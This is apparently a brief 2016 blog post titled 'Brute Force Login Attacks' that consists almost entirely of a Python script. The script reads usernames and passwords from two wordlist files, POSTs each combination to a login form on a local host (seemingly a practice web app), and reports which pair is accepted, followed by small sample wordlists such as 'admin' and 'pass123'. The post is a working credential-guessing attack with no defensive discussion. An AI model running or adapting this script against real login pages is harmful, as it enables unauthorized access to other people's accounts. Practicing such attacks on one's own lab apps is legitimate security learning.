Skip to content

Brute Force Login Attacks

2016-12-16 01:57:18

import urllib.request
import urllib.parse

loginFilePath = "login.txt"
passFilePath = "pass.txt"

def login_success(response):
    return 'Account does not exist' not in str(response.read().decode('utf8'))

def try_this(idx1, idx2, _login, _pass):
    req = urllib.request.Request(
            'http://local.host/some_page/index.php?page=login.php',
            data=urllib.parse.urlencode({
                'username': _login,
                'password': _pass,
                'login-php-submit-button': 'Login'
            }).encode('utf8'),
            method='POST'
    )
    response = urllib.request.urlopen(req)

    success = login_success(response)

    if success:
        print("Success:", idx1, idx2, _login, _pass)
    else:
        print("Error:", idx1, idx2, _login, _pass)

    return success

with open(loginFilePath) as loginFile:
    for idx1, _login in enumerate(loginFile):
        with open(passFilePath) as passFile:
            for idx2, _pass in enumerate(passFile):
                _login = _login.strip()
                _pass = _pass.strip()

                success = try_this(idx1, idx2, _login, _pass)
                if success: break

login.txt

admin
admin@admin

pass.txt

admin
pass123
123